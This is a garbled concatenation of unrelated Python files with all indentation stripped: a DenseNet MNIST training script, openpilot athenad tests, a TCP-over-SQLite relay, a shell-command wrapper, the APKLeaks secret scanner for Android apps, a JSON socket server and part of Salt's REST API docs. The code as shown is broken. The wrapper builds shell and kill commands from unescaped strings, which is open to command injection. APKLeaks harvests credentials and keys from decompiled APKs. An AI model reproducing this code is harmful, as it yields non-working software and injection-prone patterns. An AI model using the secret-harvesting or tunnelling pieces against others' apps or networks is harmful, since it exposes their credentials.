def train_test(depth, growth_rate, dropout, augment, validate, epochs,
eta, save_weights, save_errors, batchsize=64):
# import (deferred until now to make --help faster)
import numpy as np
import theano
import theano.tensor as T
import lasagne
import densenet as densenet # or "import densenet" for slower version
import cifar10
import progress
seed = 42
draw_flag = True
np.random.seed(seed)
# Logging operations
output_path = '/results/' + os.getcwd().split('/')[-1] + '/' + os.path.basename(__file__).split('.')[0] + '/' + time.strftime(
"%d-%m-%Y_") + time.strftime("%H:%M:%S") + '/'
pyscript_name = os.path.basename(__file__)
create_result_dirs(output_path, pyscript_name)
sys.stdout = Logger(output_path)
print('seed: ', seed)
# instantiate network
print("Instantiating network...")
input_var = T.tensor4('inputs')
target_var = T.ivector('targets')
network = densenet.build_densenet(input_var=input_var, depth=depth,
growth_rate=growth_rate, dropout=dropout)
if draw_flag:
        draw_to_file(network, output_path, list_flag=False)
print("%d layers with weights, %d parameters" %
(sum(hasattr(l, 'W')
for l in lasagne.layers.get_all_layers(network)),
lasagne.layers.count_params(network, trainable=True)))
# load dataset
print("Loading dataset...")
val_size = 5000
num_labeled_data = 100
# X, y, X_test, y_test = cifar10.load_dataset(
# path=os.path.join(os.path.dirname(__file__), 'data'))
print("Loading dataset...")
dataset = 'MNIST-test'
X_test, y_test = load_dataset(dataset)
dataset = 'MNIST-train'
X, y = load_dataset(dataset)
X, X_test = normalize(X, X_test, '[-1, -1]')
X, X_test = pad_data(X, X_test, 32)
num_data = X.shape[0]
if validate == 'test':
X_val, y_val = X_test, y_test
elif validate:
X_val, y_val = X[-5000:], y[-5000:]
X_train, y_train = X[:-5000], y[:-5000]
# X_train, X_val, y_train, y_val = balanced_subsample(X_train, y_train, subsample_size=10000)
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=val_size, random_state=seed,
stratify=y)
semi_supervised_flag = False
semi_supervised_idx = None
if num_labeled_data < num_data:
semi_supervised_flag = True
semi_supervised_idx = np.int32(np.zeros(num_data))
# X_unlabeled, X_labeled, y_unlabeled, y_labeled, indices = balanced_subsample(X_train, y_train, subsample_size=num_labeled_data, shuffle_flag=False)
_, _, _, _, indices = balanced_subsample(X_train, y_train, subsample_size=num_labeled_data,
shuffle_flag=False)
semi_supervised_idx[indices] = 1
X = np.concatenate((X_train, X_val), axis=0)
y = np.concatenate((y_train, y_val), axis=0)
X = X[indices]
y = y[indices]
# define training function
print("Compiling training function...")
prediction = lasagne.layers.get_output(network)
prediction_clean = lasagne.layers.get_output(network, deterministic=True)
# note: The Keras implementation clips predictions for the categorical
# cross-entropy. This doesn't seem to have a positive effect here.
# prediction = T.clip(prediction, 1e-7, 1 - 1e-7)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var).mean()
# loss_squared = lambda_clean * lasagne.objectives.squared_error(prediction, prediction_clean).mean()
# note: The paper says 1e-4 decay, but 1e-4 in Torch is 5e-5 elsewhere.
# However, 1e-4 seems to work better than 5e-5, so we use 1e-4.
# note: Torch includes biases in L2 decay. This seems to be important! So
# we decay all 'trainable' parameters, not just 'regularizable' ones.
l2_loss = 6e-4 * lasagne.regularization.regularize_network_params(
network, lasagne.regularization.l2, {'trainable': True})
params = lasagne.layers.get_all_params(network, trainable=True)
eta = theano.shared(lasagne.utils.floatX(eta), name='eta')
updates = lasagne.updates.nesterov_momentum(
loss + l2_loss, params, learning_rate=eta, momentum=0.9)
train_fn = theano.function([input_var, target_var], loss, updates=updates)
l2_fn = theano.function([], l2_loss)
# define validation/testing function
print("Compiling testing function...")
test_loss = lasagne.objectives.categorical_crossentropy(prediction_clean,
target_var).mean()
test_err = 1 - lasagne.objectives.categorical_accuracy(prediction_clean,
target_var).mean(
dtype=theano.config.floatX)
test_fn = theano.function([input_var, target_var], [test_loss, test_err])
# Finally, launch the training loop.
print("Starting training...")
if save_errors:
errors = []
for epoch in range(epochs):
# shrink learning rate at 50% and 75% into training
if epoch == (epochs // 2) or epoch == (epochs * 3 // 4):
eta.set_value(eta.get_value() * lasagne.utils.floatX(0.1))
# if (epoch == (120)) or (epoch == (210)) or (epoch == (270)):
# eta.set_value(eta.get_value() * lasagne.utils.floatX(0.2))
# In each epoch, we do a full pass over the training data:
train_loss = 0
# clean_loss = 0
train_batches = len(X) // batchsize
batches = cifar10.iterate_minibatches(X, y, batchsize,
shuffle=True)
if augment:
batches = cifar10.augment_minibatches(batches)
batches = generate_in_background(batches)
batches = progress.progress(
batches, desc='Epoch %d/%d, Batch ' % (epoch + 1, epochs),
total=train_batches)
for inputs, targets in batches:
tr_loss = train_fn(inputs, targets)
train_loss += tr_loss
# clean_loss += cl_loss
# And possibly a full pass over the validation data:
if validate:
val_loss = 0
val_err = 0
val_batches = len(X_val) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_val, y_val,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
val_loss += loss
val_err += err
# Then we print the results for this epoch:
train_loss /= train_batches
l2_loss = l2_fn()
print(" training loss:\t%.6f" % train_loss)
# print(" clean loss: \t%.6f" % clean_loss)
print(" L2 loss: \t%.6f" % l2_loss)
if save_errors:
errors.extend([train_loss, l2_loss])
if validate:
val_loss /= val_batches
val_err /= val_batches
print(" validation loss:\t%.6f" % val_loss)
print(" validation error:\t%.2f%%" % (val_err * 100))
if save_errors:
errors.extend([val_loss, val_err])
test_loss = 0
test_err = 0
test_batches = len(X_test) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_test, y_test,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
test_loss += loss
test_err += err
print(" test loss:\t\t%.6f" % (test_loss / test_batches))
print(" test error:\t\t%.2f%%" % (test_err / test_batches * 100))
# After training, we compute and print the test error:
test_loss = 0
test_err = 0
test_batches = len(X_test) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_test, y_test,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
test_loss += loss
test_err += err
print("Final results:")
print(" test loss:\t\t%.6f" % (test_loss / test_batches))
print(" test error:\t\t%.2f%%" % (test_err / test_batches * 100))
# Optionally, we dump the network weights to a file
if save_weights:
np.savez(save_weights, *lasagne.layers.get_all_param_values(network))
# Optionally, we dump the learning curves to a file
if save_errors:
errors = np.asarray(errors).reshape(epochs, -1)
np.savez(save_errors, errors=errors)
def main():
# parse command line
parser = opts_parser()
args = parser.parse_args()
# run
train_test(**vars(args))
if __name__ == "__main__":
main()
|
test.py
|
#!/usr/bin/env python3
import json
import os
import requests
import tempfile
import time
import threading
import queue
import unittest
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from selfdrive.athena import athenad
from selfdrive.athena.athenad import dispatcher
from selfdrive.athena.test_helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.ROOT = tempfile.mkdtemp()
athenad.Params = MockParams
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = set([cls.SOCKET_PORT])
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_thermal():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("thermal")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message()
msg.init('thermal')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_thermal)
p.start()
time.sleep(0.1)
try:
thermal = dispatcher["getMessage"]("thermal")
assert thermal['thermal']
finally:
p.terminate()
def test_listDataDirectory(self):
print(dispatcher["listDataDirectory"]())
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
try:
athenad._do_upload(item)
except requests.exceptions.ConnectionError:
pass
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
finally:
os.unlink(fn)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, 404)
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['item'])
self.assertIsNotNone(resp['item'].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
finally:
athenad.upload_queue = queue.Queue()
os.unlink(fn)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
os.unlink(fn)
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0 and len(athenad.cancelled_uploads) == 0:
break
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
try:
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
finally:
athenad.upload_queue = queue.Queue()
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
athenad.payload_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
try:
resp = athenad.response_queue.get(timeout=3)
self.assertDictEqual(resp.data, {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
if __name__ == '__main__':
unittest.main()
|
clientside.py
|
#!/usr/bin/env python3
import socket
import sqlite3
import threading
import time
import traceback
from datetime import datetime
from constants import *
lock = threading.Lock()
min_noninserted_conn_id = SEQ_MIN_VALUE
next_conn_id = SEQ_MIN_VALUE
data_from_db = {} # : dict[int, tuple[bool, bytes]]
data_to_db = {} # : dict[int, tuple[bool, bytes]]
next_chunk_ids = {} # : dict[int, int]
dead_serverside_conn_ids = set() # : set[int]
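# Table layout assumed by the queries below (inferred from this file, not
# verified against the real schema):
#   data(conn_id, direction, chunk_id, chunk_data)
#   dead_serverside_conn_ids(conn_id)
#   clientside_conn_ids(conn_id)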
def sync_with_db():
print(f"{datetime.now().isoformat()} db synchronizing. to: {list(data_to_db.keys())}")
global data_from_db, min_noninserted_conn_id, next_chunk_ids, dead_serverside_conn_ids
with lock:
with sqlite3.connect(DBNAME, DB_TIMEOUT) as con:
try:
# con.set_trace_callback(print)
cur = con.cursor()
new_data_from_db = data_from_db.copy()
new_next_chunk_ids = next_chunk_ids.copy()
keys_of_data = []
# data from db
for (conn_id, chunk_id, chunk_data) in cur.execute("""\
SELECT conn_id, chunk_id, chunk_data
FROM data
WHERE direction = ?
ORDER BY conn_id, chunk_id
""", (DIRECTION_TO_CLIENT,)):
down, data = new_data_from_db.get(conn_id, (False, b""))
down = down or not chunk_data
data = data + chunk_data
if conn_id in next_chunk_ids:
new_data_from_db[conn_id] = down, data
keys_of_data.append((conn_id, DIRECTION_TO_CLIENT, chunk_id))
cur.executemany("DELETE FROM data WHERE conn_id = ? AND direction = ? AND chunk_id = ?", keys_of_data)
# data to db
for (conn_id, (down, data)) in data_to_db.items():
next_chunk_id = new_next_chunk_ids.get(conn_id, SEQ_MIN_VALUE)
params = [(conn_id, DIRECTION_TO_SERVER, next_chunk_id, data)]
if down and data:
params.append((conn_id, DIRECTION_TO_SERVER, next_chunk_id + 1, b""))
cur.executemany("INSERT INTO data VALUES (?, ?, ?, ?)", params)
new_next_chunk_ids[conn_id] = next_chunk_id + len(params)
# conn_ids
db_dead_serverside_conn_ids = \
set(map(lambda t: t[0], cur.execute("SELECT conn_id FROM dead_serverside_conn_ids")))
new_dead_serverside_conn_ids = \
next_chunk_ids.keys() & \
(dead_serverside_conn_ids | (db_dead_serverside_conn_ids - dead_serverside_conn_ids))
if new_dead_serverside_conn_ids != db_dead_serverside_conn_ids:
cur.execute("DELETE FROM dead_serverside_conn_ids")
cur.executemany(
"INSERT INTO dead_serverside_conn_ids VALUES (?)",
map(lambda i: (i,), new_dead_serverside_conn_ids)
)
db_clientside_conn_ids = \
set(map(lambda t: t[0], cur.execute("SELECT conn_id FROM clientside_conn_ids")))
if next_chunk_ids.keys() != db_clientside_conn_ids:
cur.execute("DELETE FROM clientside_conn_ids")
cur.executemany(
"INSERT INTO clientside_conn_ids VALUES (?)",
map(lambda i: (i,), next_chunk_ids.keys())
)
# commit
con.commit()
# update cache
min_noninserted_conn_id = next_conn_id
data_from_db = new_data_from_db
data_to_db.clear()
next_chunk_ids = new_next_chunk_ids
dead_serverside_conn_ids = new_dead_serverside_conn_ids
except Exception as e: # sqlite3.Error:
print(f"Rolling back. {e}")
print(traceback.format_exc())
con.rollback()
print(
f"{datetime.now().isoformat()} "
f"db synchronized. "
f"from: {list(data_from_db.keys())}, "
f"conns: {next_chunk_ids}, "
f"dead_svr_conns: {list(dead_serverside_conn_ids)}"
)
def handle_db():
while True:
sync_with_db()
time.sleep(DB_SLEEP_TIME)
def get_conn_id():
global next_conn_id
with lock:
conn_id = next_conn_id
next_chunk_ids[conn_id] = SEQ_MIN_VALUE
next_conn_id = next_conn_id + 1
return conn_id
def handle_client_socket(client_socket: socket.socket):
try:
with client_socket as s:
s.settimeout(SLEEP_TIME)
conn_id = get_conn_id()
print(f"{datetime.now().isoformat()} connection {conn_id} started")
sending = True
send_data_remains = False
receiving = True
while sending or receiving:
if sending: # to the client
# print(f"connection {conn_id} writing")
with lock:
data_from_db_pair = data_from_db.get(conn_id)
if data_from_db_pair:
del data_from_db[conn_id]
if data_from_db_pair:
down, data = data_from_db_pair
if data:
sent = s.send(data[:BUFSIZE])
send_data_remains = sent != len(data)
if send_data_remains:
with lock:
new_data_from_db_pair = data_from_db.get(conn_id)
if new_data_from_db_pair:
data_from_db[conn_id] = \
new_data_from_db_pair[0], new_data_from_db_pair[1][sent:]
else:
data_from_db[conn_id] = down, data[sent:]
if down and not send_data_remains:
s.shutdown(socket.SHUT_WR)
sending = False
print(f"{datetime.now().isoformat()} connection {conn_id} write shutdown")
if receiving: # from the client
# print(f"connection {conn_id} reading")
try:
chunk = s.recv(BUFSIZE)
except socket.timeout: # BlockingIOError:
pass
else:
with lock:
down, data = data_to_db.get(conn_id, (False, b""))
data_to_db[conn_id] = down or not chunk, data + chunk
if not chunk:
receiving = False
print(f"{datetime.now().isoformat()} connection {conn_id} read shutdown")
with lock:
alive = conn_id not in dead_serverside_conn_ids
# print(f"connection {conn_id} is alive: {alive}")
if not send_data_remains and not alive:
print(f"{datetime.now().isoformat()} connection {conn_id} is dead on the server side")
break
if not receiving:
time.sleep(SLEEP_TIME)
finally:
with lock:
if conn_id in next_chunk_ids:
del next_chunk_ids[conn_id]
if conn_id in data_from_db:
del data_from_db[conn_id]
if conn_id in data_to_db:
del data_to_db[conn_id]
print(f"{datetime.now().isoformat()} connection {conn_id} closed: {next_chunk_ids}")
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(LISTENING_ADDRESS)
server_socket.listen()
threading.Thread(target=handle_db).start()
while True:
(client_socket, address) = server_socket.accept()
threading.Thread(target=handle_client_socket, args=(client_socket,)).start()
|
process.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is used to execute the shell script.
"""
import os
import subprocess
import threading
class Process(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def process_cmd(self):
try:
self.process = subprocess.Popen("exec " + self.cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
return self.process
except Exception:
return None
def process_cmd_asyc_end(self, key_word):
self.stop_thread.set()
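        # Kill every process whose command line contains key_word: ps -ef lists
        # processes, grep filters on key_word (excluding the grep itself), awk
        # extracts the PID column, and xargs passes the PIDs to kill.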
kill_cmd = "ps -ef | grep '" + key_word + "' | grep -v grep | awk '{print $2}' | xargs kill"
print(kill_cmd)
os.popen(kill_cmd)
def process_cmd_asyc(self):
self.stop_thread = threading.Event()
self.process = subprocess.Popen(self.cmd,
bufsize=0,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
print(self.process.pid)
proc_thread = threading.Thread(target=self.read, args=(self.process,))
proc_thread.start()
def read(self, process):
while not self.stop_thread.is_set():
output = process.stdout.readline().decode("UTF-8")
# TODO: should add the logic to record the log info here. This will be addressed by issue ID #33
print(output.strip())
if output == "" and self.process.poll() is not None:
break
def get_process(self):
return self.process
def get_process_result(self):
self.process_cmd()
return self.process.communicate()[0].decode("UTF-8")
def get_process_list(self):
self.process_cmd()
res = self.process.communicate()[0].decode("UTF-8")
return res if res is not None else ""
def get_process_content(self):
self.process_cmd()
return self.process.check_out()
@staticmethod
def execute_command(cmd):
process = subprocess.Popen("exec " + cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
process.communicate()
|
apkleaks.py
|
#!/usr/bin/env python3
from apkleaks.colors import clr
from contextlib import closing
from distutils.spawn import find_executable
from pyaxmlparser import APK
from urllib.request import urlopen
from zipfile import ZipFile
import io
import json
import logging.config
import mimetypes
import numpy
import os
import re
import shutil
import sys
import tempfile
import threading
class APKLeaks:
def __init__(self, args):
self.file = args.file
self.prefix = "apkleaks-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
self.output = tempfile.mkstemp(suffix=".txt", prefix=self.prefix)[1] if args.output is None else args.output
self.pattern = self.main_dir + "/../config/regexes.json" if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else self.main_dir + "/../jadx/bin/jadx%s" % (".bat" if os.name == "nt" else "")
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(self.main_dir + "/../jadx")
os.chmod(self.jadx, 33268)
def write(self, message, color):
sys.stdout.write("%s%s%s" % (color, message, clr.ENDC))
def writeln(self, message, color):
self.write(message + "\n", color)
def integrity(self):
if os.path.exists(self.jadx) is False:
self.writeln("Can't find jadx binary.", clr.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
self.write("Do you want to download jadx? (Y/n) ", clr.OKBLUE)
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
self.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", clr.WARNING)
if choice:
self.writeln("** Downloading jadx...\n", clr.OKBLUE)
self.dependencies()
else:
sys.exit(self.writeln("Aborted.", clr.FAIL))
if os.path.isfile(self.file) is True:
try:
self.apk = self.apk_info()
except Exception as e:
sys.exit(self.writeln(str(e), clr.WARNING))
else:
return self.apk
else:
sys.exit(self.writeln("It's not a valid file!", clr.WARNING))
def decompile(self):
self.writeln("** Decompiling APK...", clr.OKBLUE)
with ZipFile(self.file) as zipped:
try:
dex = self.tempdir + "/" + self.apk.package + ".dex"
with open(dex, "wb") as classes:
classes.write(zipped.read("classes.dex"))
except Exception as e:
sys.exit(self.writeln(str(e), clr.WARNING))
dec = "%s %s -d %s --deobf" % (self.jadx, dex, self.tempdir)
os.system(dec)
return self.tempdir
def unique(self, list):
x = numpy.array(list)
return (numpy.unique(x))
def finder(self, pattern, path):
matcher = re.compile(pattern)
found = []
for path, _, files in os.walk(path):
for fn in files:
filepath = os.path.join(path, fn)
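                # Skip files whose MIME type cannot be guessed from the file
                # extension (presumably to avoid unscannable binary resources).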
if mimetypes.guess_type(filepath)[0] is None:
continue
with open(filepath) as handle:
for lineno, line in enumerate(handle):
mo = matcher.search(line)
if mo:
found.append(mo.group())
return self.unique(found)
def extract(self, name, matches):
output = open(self.output, "a+")
if matches:
stdout = ("[%s]" % (name))
self.writeln("\n" + stdout, clr.OKGREEN)
output.write(stdout + "\n")
for secret in matches:
if name == "LinkFinder" and re.match(r"^.(L[a-z]|application|audio|fonts|image|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
stdout = ("- %s" % (secret))
print(stdout)
output.write(stdout + "\n")
output.write("\n")
output.close()
def scanning(self):
self.writeln("\n** Scanning against '%s'" % (self.apk.package), clr.OKBLUE)
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for pattern in pattern:
thread = threading.Thread(target = self.extract, args = (name, self.finder(pattern, self.tempdir)))
thread.start()
else:
thread = threading.Thread(target = self.extract, args = (name, self.finder(pattern, self.tempdir)))
thread.start()
def __del__(self):
print("%s\n** Results saved into '%s%s%s%s'%s" % (clr.OKBLUE, clr.ENDC, clr.OKGREEN, self.output, clr.OKBLUE, clr.ENDC))
try:
shutil.rmtree(self.tempdir)
except Exception:
return
|
Server.py
|
import numpy as np
import errno
from threading import Thread, Lock
import time
from contextlib import contextmanager
import os
import json
from utils_ import *
import socket
def server(data_dict, ADDR):
"""
Listen and connect with clients.
:param data_dict: store data and exit flag
:param ADDR: the address (ip, port) of the server
:return:
"""
print('Server Run task %s (%s)...' % (ADDR, os.getpid()))
listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_socket.bind(ADDR)
    listen_socket.listen(5)  # request queue (backlog) size
# signal.signal(signal.SIGCHLD, grim_reaper)
while True:
try:
# print("Server of %s listening" % name)
client_connection, client_address = listen_socket.accept()
t = Thread(target=receive_data, args=(client_connection, data_dict))
t.start()
except IOError as e:
print("Server error !! %s" % e)
code, msg = e.args
# restart 'accept' if it was interrupted
if code == errno.EINTR:
continue
else:
raise
def receive_data(a_socket, data_dict):
"""
    Receive data from the connected client and save it to the data_dict.
    :param a_socket: the socket to read from
    :param data_dict: the dict in which to save received raw data and to set the exit flag.
:return:
"""
buffer = b''
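    # Framing, as inferred from the parsing below: the client sends a stream of
    # JSON payloads separated by b'$'; a payload equal to 'EXIT' sets the exit
    # flag and closes the connection.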
while True:
data = a_socket.recv(2048)
try:
if not data:
time.sleep(0.001)
continue
while b"$" not in data:
buffer += data
try:
data = a_socket.recv(2048)
except Exception as e:
                    print("data receive exception: %s" % e)
except Exception as e:
            print("receiver error: %s" % e)
print("data is : %d" % len(buffer))
try:
tail = data.split(b'$')
buffer += tail[0] # Add tail of a json to the buffer to form a compact json.
if buffer[-8:] == b'$':
buffer = buffer[:-8]
jsons = [buffer] # List of jsons, each is a compact data package in json format.
if len(tail) > 2:
jsons += tail[1:-1]
except Exception as e:
            print("Exception:", e)
# Append broken tail into the data buffer for further data receiving, whether it is empty or not
if len(tail) >= 2:
buffer = tail[-1]
else:
buffer = b''
try:
bytes_len = sum([len(x) for x in jsons])
jsons = [x.decode("utf-8") for x in jsons]
except Exception as e:
print("Data decode error: %s" % e)
return
# Iterate each data package (json)
for data in jsons:
if data == 'EXIT': # Judge exit flag here
data_dict.exit_flag = True
a_socket.close()
return
try:
received_data = json.loads(data)
except Exception as e:
print("received data '%s' can not be loaded as json. \n Error: %s" % (data, e))
received_data = {}
try:
stamp = received_data.pop('stamp')
# List to numpy array
for key in received_data.keys():
if type(received_data[key]) is list:
received_data[key] = np.asarray(received_data[key])
# Update client data with thread lock.
if data_dict.lock.acquire():
try:
data_dict.byte_len += bytes_len
data_dict.data.update(received_data)
data_dict.received_sender.add(stamp[2]) # mark sender.
finally:
data_dict.lock.release()
else:
print("Filed to get lock!!!")
# print(bytes_len)
except Exception as e:
print("Exception of stamp %s" % e)
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
